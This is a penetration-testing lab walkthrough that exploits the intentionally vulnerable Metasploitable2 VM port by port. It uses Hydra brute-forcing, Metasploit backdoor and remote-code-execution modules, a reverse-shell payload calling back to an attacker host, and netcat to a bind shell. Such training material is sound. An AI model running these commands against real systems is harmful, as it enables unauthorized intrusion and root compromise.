Metasploitable2
Metasploitable2 Complete Overview
Metasploitable is an intentionally vulnerable Linux virtual machine.
This VM can be used to conduct security training, test security tools, and practice common penetration testing techniques.
Installation and configuration
We are here to exploit Metasploitable 2 (Damn vulnerable machine for penetration testing)
Get this Metasploiable2 machine from https://information.rapid7.com/download-metasploitable-2017.html
Installation Process:
- Open VirtualBox and Click on “New” button to create a new virtual machine
- Type the Virtual Machine name(Metasploitable2)
- Allocate the amount of memory(Preferable but not below 512mb)
- Select Use an existing hard disk file
- Select the vmdk file that you have downloaded from Rapid7
- Click on Create…!!! Successfully Installed Metasploitable2, Now it’s time to configure network settings.
After installation change the network adapter settings as follows :
In-Network Setting: Settings/Network/Adapter Select Ethernet or Wireless
In Advanced tab Select: Promiscuous Mode as Allow All
Bootup the Metasploitable2 machine and Try to login using given credentials on Banner…!!!
Find machine IP address by using the following command in terminal
ifconfig
That’s All for setup….Let’s Start Hacking…
Walkthrough
Scanning
Scanning the Matasploitable 2
As we noticed the IP address of the machine is 192.168.0.130
Let’s begin scanning with Nmap which is part of Kali Linux
nmap -sV -p- 192.168.0.130
Exploiting all ports in different techniques :
21-FTP
Method 1:
Login with Anonymous as username and no password.
If you need more info about Anonymous FTP you can find it here.
https://whatis.techtarget.com/definition/anonymous-FTP-File-Transfer-Protocol
ftp 192.168.0.130
Method 2 :
Through Brute-force using Hydra but you need to have a custom list of usernames and passwords.
hydra -L /root/Desktop/USERNAMES.txt -P /root/Desktop/PASSWORDS.txt <Target IP Address> ftp -V
It will take each username and password from the given files and try to login to the target FTP service.
Once you found the credentials you can directly log in.
After login to a user account, You can get root access by doing Privilege escalation.
Method 3 :
Exploiting FTP through Metasploit framework
open Metasploit framework console and search for vsftpd Backdoor exploit
msfconsole
Search vsftpd
use exploit/unix/ftp/vsftpd_234_backdoor
show options
set RHOSTS 192.168.0.130 --> <target IP address>exploit
Congratulations you got root access
22-SSH
Secure Shell (SSH) is a cryptographic network protocol for operating network services securely over an unsecured network.
Exploiting SSH in Different Techniques
Method 1
Cracking Username and password with Hydra
Hydra is an inbuilt tool in Kali-Linux used to Brute force attack is a trial and error method used by application programs to decode encrypted data such as passwords or Data Encryption Standard (DES) keys, through exhaustive effort (using brute force) rather than employing intellectual strategies.
hydra -L <Usernames_List> -P <Passwords_List> <Target ip address> <Service>
Method 2
Open Metasploit framework
Open terminal and type these commands :
service postgresql startmsfconsolesearch ssh_loginuse auxiliary/scanner/ssh/ssh_login
set this auxiliary and see what it requires.
set RHOSTS <target IP Address> --> in my case 192.168.0.130
Set predefined Usernames list and Passwords List
set USER_FILE <Username file Path>set PASS_FILE <Password file Path>exploit
It will take time-based your usernames and passwords List and It will Notify with username: password and login with those credentials.
ssh username@targetipaddress
You have user access, can’t perform all the tasks so try to get root access by doing Privilege escalation.
23-TELNET
Telnet is a simple, text-based network protocol that is used for accessing remote computers over TCP/IP networks like the Internet. Telnet was created and launched in 1969 and, historically speaking, you can say that it was the first Internet.
telnet <target IP Address> --> 192.168.0.130
By default it will Grab Metasploitable 2 banner, it shows that Login with msfadmin/msfadmin to get a start. Just enter those credentials you are in.
25-SMTP
SMTP is part of the application layer of the TCP/IP protocol. Using a process called “store and forward,” SMTP moves your email on and across networks. It works closely with something called the Mail Transfer Agent (MTA) to send your communication to the right computer and email inbox.
Method 1:
Using Metasploit
Start the Metasploit by executing the commands
service postgresql startmsfconsole -qsearch smtp_version
use auxiliary/scanning/smtp/smtp_version (or) you can type use 0show optionsset RHOST 192.168.0.130exploit (or) runshow optionsset RHOST 192.168.0.130exploit (or) run
SMTP stands for Simple Mail Transport Protocol and is a server-to-server protocol and keeps a local database of users to which it must send and receive emails.
SMTP has a set of commands. We’re going to connect to our target with “netcat” through port 25 and try to acquire this database emails.
Open a new terminal and type:
nc 192.168.0.130 25
Now the connection is established you can verify by the “SMTP” commands
Type: vrfy user
vrfy (This is a non-interactive shell)
For SMTP Commands Visit: http://www.tcpipguide.com/free/t_SMTPCommands-2.htm
Method 2
Using smtp_enum
This is can be done by Metasploit
search smtp_enum
use auxiliary/scanner/smtp/smtp_enum
show optionsset RHOST 192.168.0.130exploit
This method is using enumeration to find out this list of users in the SMTP service.
Later NetCat can be helpful to get a reverse connection with that user.
139&445 Netbios-SSN
Samba is an open-source project that is widely used on Linux and Unix computers so they can work with Windows file and print services.
We can even use Samba as an Active server to handle login, authentication and access control for a Windows network.
Search for exploit
use exploit/multi/samba/usermap_script
To view the options for the exploit
show optionsSet RHOST192.168.0.130 (Target IP address)
Set the payload
Show payloadsSet payload cmd/unix/reverse
Set required arguments for payload
Show optionsSet LHOST 192.168.0.109 (Attackers IP Address)Set LPORT 4444
Check once all required arguments are filled
exploit
1099–Java-RMI
Remote Method Invocation (RMI) is an API that allows an object to invoke a method on an object that exists in another address space, which could be on the same machine or a remote machine.
Exploiting java-RMI-server
search for the exploit
search java_rmi_server
Choose the exploit according to their rank. for instance, “excellent” works better than “normal”.
use exploit/multi/misc/java_rmi_servershow optionsset RHOSTS <target's IP>exploit
We got access to the target machine.
1524-BINDSHELL
Bind shell is a type of shell in which the target machine opens up a communication port or a listener on the victim machine and waits for an incoming connection. The attacker then connects to the victim machine’s listener which then leads to code or command execution on the server.
Exploitation
It is a root shell so we can connect through netcat service.
nc <target ip address> 1524
Congratulations, You are a root user now.
2121-ProFTPD
Before exploiting this port you need to have login credentials so as we know the method get it through Brute-force technique, We can access ProFTPd with telnet, We are using here user: user.
telnet <Taget IP Address> <Port Number>USER <username>
PASS <password>
It is a normal user, Try Privilege Escalation to gain root control.
3306-MYSQL
Method 1:
search for the exploit
search scanner/mysql/mysql_login
use auxiliary/scanner/mysql/mysql_login
Sometimes there might be a chance of having a blank password for MySQL. So we can exploit it directly.
Note: by default, it shows BLANK_PASSWORDS as false, set it to true.
set BLANK_PASSWORDS as true
Method:2
In this method, we are going to exploit MySQL by using this command providing the username as root and target’s IP.
mysql -u root -h <target's IP>
3632-DISTCCD
Distcc is a tool for speeding up the compilation of source code by using distributed computing over a computer network. With the right configuration
distcc can dramatically reduce a project’s compilation time
Exploiting port 3632 using distcc-exec
Open msfconsole and search for distcc_exec
search distcc_execshow options
Set required arguments to exploit
set RHOSTS <target-ip>exploit
We got Shell Access…try to do privilege escalation for Higher privilege
5432-Postgresql
Exploiting PostgreSQL with postgre_payload
Open msfconsole & search for postgres_payload
search postgres_payloaduse exploit/linux/postgres/postgres_payloadshow options
Set required arguments for exploit
set RHOSTS <target-ip>
By default, it will use username as postgres
exploit
Successfully logged in postgresql…Let’s get a shell for doing more stuff…
Try to do privilege escalation…Happy learning..!!!
5900-VNC
Open msfconsole and search for exploit vnc_login
search vnc_loginuse auxiliary/scanner/vnc/vnc_login
show optionsset RHOSTS <targets IP>set PASS_FILE <filepath that contains passwords>run (or) exploit
This method is used to exploit VNC software hosted on Linux or Unix or Windows Operating Systems with authentication vulnerability.
Try to connect vnc with that password
Open Vnc Viewer in Terminal & Type the IP address and connect
a login prompt popup and ask to provide credentials
Then Enter the password and click OK.
Voilaaa…!!! you got Access…I know what are you thinking right Now..Don’t mess with the things around..Happy Learning.
6000-X11
The X Window System (aka X) is a windowing system for bitmap displays, which is common on UNIX-based operating systems. X provides the basic framework for a GUI based environment.
The remote X11 server accepts connections from anywhere one can get an Internet connection. It is responsible for access to the graphics cards, the input devices, and the display screen on either computer or wireless device.
Exploiting port 6000 using ssh
ssh -X -l msfadmin 192.168.0.122
In the above command ‘X’ enables all ports forwarding, by providing username and target’s IP gives us the shell
6667 & 6697 UnrealIRCD
UnrealIRCd is an Open Source IRC Server, serving thousands of networks since 1999. It runs on Linux, OS X, and Windows
UnrealIRCd is a highly advanced IRCd with a strong focus on modularity, an advanced and highly configurable configuration file. Key features include SSL
UnrealIRCd is one of the most popular and full-featured IRC daemons and is used on the largest number of IRC servers
This server is described as having possibly the most security features of any IRC server.
Protocols used: Internet Relay Chat
Let’s Exploit this IRC Server.
Method 1: on port 6667
search unrealircduse exploit/unix/irc/unreal_ircd_3281_backdoorshow options
Set the required arguments for exploit
set RHOSTS <target-ip>
by default 6667 port number is assigned to exploit
run (or) exploit
Heyyy…We got root…We are living on the edge…
Method 2: On port 6697
Use above exploit and set the required arguments
- This time set port as 6697
set RHOSTS <target-ip>set RPORT 6697
And Second time also we got root…Try to Exploit this…Happy learning
8180-TOMCAT
Apache Tomcat is an open-source implementation of the Java Servlet, JavaServer Pages, Java Expression Language, and WebSocket technologies. Tomcat provides a “pure Java” HTTP web server environment in which Java code can run.
Exploiting Apache-Tomcat
It can be completed in two steps:
Open msfconsole & search for tomcat_mgr_login
search tomcat_mgr_loginset RHOSTS <target-ip>
show options
Exploit will assign default usernames & passwords lists. After setting the arguments to exploit Type exploit (or) run
run
Take the same username and password and give it to the next exploit.
search for tomcat manager exploits
search tomcat_mgr_uploaduse exploit/multi/http/tomcat_mgr_uploadshow options
Set RHOSTS, RPORT, and HttpPassword, HttpUsername which we got from tomcat login exploit and then run the exploit.
msfconsole could assign the suitable payload for an exploit, That’s why we got meterpreter…
8787-Ruby-drb
dRuby is a distributed object system for Ruby. It is written in pure Ruby and uses its protocol.
No addon services are needed beyond those provided by the Ruby run time, such as TCP sockets.
search drb_remote_codeexec
Set the required arguments to exploit
show optionsset RHOSTS <target-ip>exploit (or) run
Congratulations you got root shell access…try to use some shell commands.